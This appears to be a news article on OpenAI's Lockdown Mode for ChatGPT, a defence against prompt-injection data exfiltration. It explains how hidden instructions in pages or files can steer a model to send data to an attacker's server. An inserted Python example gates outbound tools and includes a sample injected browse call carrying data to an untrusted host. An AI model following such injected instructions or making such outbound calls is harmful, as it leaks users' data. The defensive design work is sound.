OpenAI Introduces 'Lockdown Mode' for ChatGPT
OpenAI is rolling out a new “Lockdown Mode” for ChatGPT, aiming to curb data theft from prompt injection attacks while openly acknowledging it cannot fully solve the problem.
Early June rollout and core design
On June 6, OpenAI announced Lockdown Mode as an added layer of defense against prompt injection attacks, where malicious instructions are hidden in webpages or other content a model reads. The company said the feature will “provide additional protection from prompt injection attacks,” in part by disabling live web browsing, deep research, agent mode, and retrieval of images from the web, while still allowing image generation.
Initially, OpenAI began rolling the mode out to self-serve ChatGPT Business accounts and some eligible personal users, targeting organizations that “handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.”
Expansion to all plans and technical trade‑offs
By June 7, coverage expanded: Lockdown Mode was described as available to logged-in users across Free, Go, Plus, Pro, and self-serve ChatGPT Business tiers. The feature now also disables Canvas networking and file downloads, shutting down the main channels an attacker could use to exfiltrate sensitive information.
OpenAI frames prompt injection as a “frontier” problem affecting all large language models, where hidden instructions in a webpage or uploaded file can trick a model into sending data to an attacker-controlled server. Lockdown Mode “does not stop injections from happening”; malicious payloads in cached pages or PDFs can still influence model behavior, but the mode aims to “substantially reduce the risk of prompt injection-based data exfiltration” by blocking outbound routes.
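The mechanism the article describes is capability gating: the model may still be steered by injected content, but the tool dispatcher refuses to execute any call that could carry data outward. The following is an added illustration of that design and is not OpenAI's code; the tool names, the dispatcher and the sample tool-call sequence are assumptions constructed for the example, while the categories disabled (browsing, deep research, agent mode, web image retrieval, Canvas networking, file downloads) and the one kept (image generation) are the ones the article lists.

```python
"""Capability gating as an exfiltration control, modelled on the article's
description of Lockdown Mode. Constructed example; the tool names, the
dispatcher and the sample calls are assumptions, not OpenAI's implementation."""
from dataclasses import dataclass
from enum import Enum


class Mode(Enum):
    STANDARD = "standard"
    LOCKDOWN = "lockdown"


# Tools that can carry data off the host. Names are assumed for this example;
# the categories match the ones the article says Lockdown Mode disables.
OUTBOUND_TOOLS = frozenset({
    "web_browse", "deep_research", "agent_mode",
    "web_image_fetch", "canvas_network", "file_download",
})

# Tools kept available in lockdown: no network egress is involved.
LOCKDOWN_ALLOWED = frozenset({"image_generate", "cached_page_read"})


@dataclass(frozen=True)
class ToolCall:
    name: str
    args: dict


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def evaluate(call: ToolCall, mode: Mode) -> Decision:
    """Decide in the dispatcher, independent of the model's reasoning, whether
    a tool call may run. Model output is treated as untrusted because it may
    already have been steered by injected instructions in a page or file."""
    if mode is Mode.STANDARD:
        return Decision(True, "standard mode: tool permitted")
    if call.name in LOCKDOWN_ALLOWED:
        return Decision(True, "lockdown: no outbound channel")
    if call.name in OUTBOUND_TOOLS:
        return Decision(False, f"lockdown: {call.name} is an outbound channel")
    return Decision(False, f"lockdown: unknown tool {call.name}, default deny")


def dispatch(calls: list[ToolCall], mode: Mode) -> list[tuple[str, bool, str]]:
    """Apply the policy to a batch of model-emitted calls and return an audit
    trail (tool, allowed?, reason). Denied outbound calls under lockdown are
    the event worth alerting on: the model tried to reach out, which is
    exactly what an injection aims for, even though nothing left the host."""
    trail = []
    for call in calls:
        decision = evaluate(call, mode)
        trail.append((call.name, decision.allowed, decision.reason))
    return trail


def exfil_blocked(calls: list[ToolCall], mode: Mode) -> bool:
    """True when no outbound-capable call in the batch is allowed to execute."""
    return not any(evaluate(c, mode).allowed for c in calls
                   if c.name in OUTBOUND_TOOLS)


# Constructed sample: calls a model might emit after reading a document.
# The second call is what a successful injection would produce; the mode does
# not stop the model from emitting it, it only stops the call from running.
SAMPLE_CALLS = [
    ToolCall("cached_page_read", {"url": "https://example.com/report"}),
    ToolCall("web_browse", {"url": "https://untrusted.invalid/?d=SUMMARY"}),
    ToolCall("image_generate", {"prompt": "chart of quarterly figures"}),
]


if __name__ == "__main__":
    for mode in Mode:
        print(f"--- {mode.value} ---")
        for name, ok, why in dispatch(SAMPLE_CALLS, mode):
            print(f"{'ALLOW' if ok else 'DENY '} {name}: {why}")
        print("outbound blocked:", exfil_blocked(SAMPLE_CALLS, mode))
```

Running the block shows the same three calls accepted in standard mode and the `web_browse` call denied in lockdown, which is the article's point in miniature: the injection still happened (the model emitted the call), but the route it needed was closed at a layer the model's reasoning cannot override. A default-deny for unrecognised tools keeps a newly added capability from silently reopening an egress path.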
Who it’s for — and what it breaks
OpenAI stresses that “Lockdown Mode is not intended for everyone,” but for users willing to sacrifice functionality for security. With the mode on, ChatGPT loses much of what makes its agents and research tools powerful: live browsing is limited to cached content, agent mode and deep research are disabled, and some app combinations may still pose residual risk.
The company presents the feature as a pragmatic, partial answer to a structural weakness of current AI systems: they “cannot reliably separate data from instructions,” leaving prompt injection as an ongoing challenge despite tighter controls.
Continue reading https://foxvector.com/stories/019ea45d-3d1b-0f39-7006-00986d1cb513